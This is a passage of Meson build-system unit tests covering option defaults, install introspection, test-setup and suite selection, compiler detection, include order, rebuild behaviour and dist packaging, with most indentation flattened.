'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
for prefix in expected:
args = ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
    def test_compiler_detection(self):
        '''
        Test that automatic compiler detection and setting from the environment
        both work just fine. This is needed because while running project tests
        and other unit tests, we always read CC/CXX/etc from the environment.
        '''
        # Shorthands for the compiler/linker classes we classify against.
        gnu = mesonbuild.compilers.GnuCompiler
        clang = mesonbuild.compilers.ClangCompiler
        intel = mesonbuild.compilers.IntelGnuLikeCompiler
        msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
        clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
        ar = mesonbuild.linkers.ArLinker
        lib = mesonbuild.linkers.VisualStudioLinker
        langs = [('c', 'CC'), ('cpp', 'CXX')]
        if not is_windows() and platform.machine().lower() != 'e2k':
            langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
        testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        # NOTE: this loop deliberately mutates os.environ (pop/set of CC, CXX,
        # AR, ...); the order of operations below is significant.
        for lang, evar in langs:
            # Detect with evar and do sanity checks on that
            if evar in os.environ:
                ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
                self.assertTrue(ecc.version)
                elinker = env.detect_static_linker(ecc)
                # Pop it so we don't use it for the next detection
                evalue = os.environ.pop(evar)
                # Very rough/strict heuristics. Would never work for actual
                # compiler detection, but should be ok for the tests.
                ebase = os.path.basename(evalue)
                if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
                    self.assertIsInstance(ecc, gnu)
                    self.assertIsInstance(elinker, ar)
                elif 'clang-cl' in ebase:
                    self.assertIsInstance(ecc, clangcl)
                    self.assertIsInstance(elinker, lib)
                elif 'clang' in ebase:
                    self.assertIsInstance(ecc, clang)
                    self.assertIsInstance(elinker, ar)
                elif ebase.startswith('ic'):
                    self.assertIsInstance(ecc, intel)
                    self.assertIsInstance(elinker, ar)
                elif ebase.startswith('cl'):
                    self.assertIsInstance(ecc, msvc)
                    self.assertIsInstance(elinker, lib)
                else:
                    raise AssertionError('Unknown compiler {!r}'.format(evalue))
                # Check that we actually used the evalue correctly as the compiler
                self.assertEqual(ecc.get_exelist(), split_args(evalue))
            # Do auto-detection of compiler based on platform, PATH, etc.
            cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
            self.assertTrue(cc.version)
            linker = env.detect_static_linker(cc)
            # Check compiler type
            if isinstance(cc, gnu):
                self.assertIsInstance(linker, ar)
                if is_osx():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
                else:
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
            if isinstance(cc, clangcl):
                self.assertIsInstance(linker, lib)
                self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
            if isinstance(cc, clang):
                self.assertIsInstance(linker, ar)
                if is_osx():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
                elif is_windows():
                    # This is clang, not clang-cl
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
                else:
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
            if isinstance(cc, intel):
                self.assertIsInstance(linker, ar)
                if is_osx():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
                elif is_windows():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
                else:
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
            if isinstance(cc, msvc):
                self.assertTrue(is_windows())
                self.assertIsInstance(linker, lib)
                self.assertEqual(cc.id, 'msvc')
                self.assertTrue(hasattr(cc, 'is_64'))
                self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
                # If we're on Windows CI, we know what the compiler will be
                if 'arch' in os.environ:
                    if os.environ['arch'] == 'x64':
                        self.assertTrue(cc.is_64)
                    else:
                        self.assertFalse(cc.is_64)
            # Set evar ourselves to a wrapper script that just calls the same
            # exelist + some argument. This is meant to test that setting
            # something like `ccache gcc -pipe` or `distcc ccache gcc` works.
            wrapper = os.path.join(testdir, 'compiler wrapper.py')
            wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
            wrappercc_s = ''
            for w in wrappercc:
                wrappercc_s += quote_arg(w) + ' '
            os.environ[evar] = wrappercc_s
            wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
            # Check static linker too
            wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
            wrapperlinker_s = ''
            for w in wrapperlinker:
                wrapperlinker_s += quote_arg(w) + ' '
            os.environ['AR'] = wrapperlinker_s
            wlinker = env.detect_static_linker(wcc)
            # Pop it so we don't use it for the next detection
            evalue = os.environ.pop('AR')
            # Must be the same type since it's a wrapper around the same exelist
            self.assertIs(type(cc), type(wcc))
            self.assertIs(type(linker), type(wlinker))
            # Ensure that the exelist is correct
            self.assertEqual(wcc.get_exelist(), wrappercc)
            self.assertEqual(wlinker.get_exelist(), wrapperlinker)
            # Ensure that the version detection worked correctly
            self.assertEqual(cc.version, wcc.version)
            if hasattr(cc, 'is_64'):
                self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertRebuiltTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertRebuiltTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
    def dist_impl(self, vcs_init, include_subprojects=True):
        # Shared implementation for the dist tests.
        #
        # ``vcs_init`` is a callable that turns a directory into a VCS
